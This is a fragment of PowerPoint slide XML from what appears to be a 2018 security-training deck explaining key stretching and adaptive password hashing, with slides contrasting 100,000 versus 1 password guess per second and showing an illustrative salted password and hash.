      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="232" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="244" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="256" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="228" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="248" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="224" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="236" grpId="6"/>
    </p:bld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40"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94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942" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="943" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="944" name="&quot;67525b4e5bf9a437259933d5bc431a0c2079cd00&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5083303" y="10575768"/>
            <a:ext cx="15020702"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"67525b4e5bf9a437259933d5bc431a0c2079cd00"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="945" name="&quot;passwordnHNG5PSGkxRC0sxFiCdz1lWFMDnDM7p1331WLSexgwn&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1732099" y="4233955"/>
            <a:ext cx="20919803"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200">
                <a:solidFill>
                  <a:srgbClr val="A7AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"passwordnHNG5PSGkxRC0sxFiCdz1lWFMDnDM7p1331WLSexgwn"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="946" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12192000" y="5329766"/>
            <a:ext cx="1" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="947" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12179625" y="8916271"/>
            <a:ext cx="1" cy="1635939"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="948" name="HASH"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10509514" y="7123018"/>
            <a:ext cx="3364972" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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HASH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5160986" y="4203825"/>
            <a:ext cx="8340793" cy="964289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:hueOff val="-554920"/>
                <a:satOff val="-21482"/>
                <a:lumOff val="-6228"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="950" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13564153" y="4200348"/>
            <a:ext cx="8741164" cy="964288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:hueOff val="46120"/>
                <a:satOff val="4178"/>
                <a:lumOff val="-16732"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="951" name="x 100,000"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16100666" y="7474337"/>
            <a:ext cx="2944863"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chemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>x 100,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="952" name="https://en.wikipedia.org/wiki/Key_stretching"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="22C864"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Key_stretching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="953" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="958" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15614921" y="5020945"/>
            <a:ext cx="8020330" cy="1464310"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="954" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="5DB2F4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="955" name="Each iteration should rely on output of previous iteration."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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i="1" sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="5DB2F4"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Each iteration should rely on output of previous iteration.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="956" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="5DB2F4"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="957" name="i"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>i</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959" name="Slow it Down"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Slow it Down</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="960" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14084653" y="6917978"/>
            <a:ext cx="1827119" cy="2019120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21326" h="15831" fill="norm" stroke="1" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="3306"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6583" y="-2850"/>
                  <a:pt x="21042" y="145"/>
                  <a:pt x="21322" y="7722"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="15270"/>
                  <a:pt x="7464" y="18750"/>
                  <a:pt x="417" y="12869"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:satOff val="-3355"/>
                <a:lumOff val="26614"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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64"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965"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966" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="967" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="968" name="I can guess and try 100,000 passwords every second!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3310799" y="3298000"/>
            <a:ext cx="17762402"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>I can guess and try 100,000 passwords every second!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="969" name="I can guess and try 1 password every second…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355454" y="9035994"/>
            <a:ext cx="15673091"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>I can guess and try 1 password every second…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="970" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="12191999" y="4678251"/>
            <a:ext cx="1" cy="4009367"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="971" name="Before"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500880" y="4671902"/>
            <a:ext cx="2325813"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800">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Before</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972" name="After"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12604030" y="7891331"/>
            <a:ext cx="1711140"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800">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>After</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76"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977"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978" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="979" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="980" name="I can guess and try 1 password every second…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355454" y="3298000"/>
            <a:ext cx="15673091"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>I can guess and try 1 password every second…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="981" name="I can guess and try 100,000 passwords every second!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3310799" y="9035994"/>
            <a:ext cx="17762402"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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>I can guess and try 100,000 passwords every second!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="982" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="12191999" y="4678251"/>
            <a:ext cx="1" cy="4009367"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="983" name="2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10027289" y="4792793"/>
            <a:ext cx="1794223"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800">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="984" name="2019"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12562488" y="7891331"/>
            <a:ext cx="1794224" cy="1031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800">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>2019</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88" name="borg.jpg" descr="borg.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="40000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3749114" y="-1"/>
            <a:ext cx="31882228" cy="13716001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="989" name="Adaptive Hashing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Adaptive Hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="990"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99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992" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="993" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="994" name="Resistance is futile."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
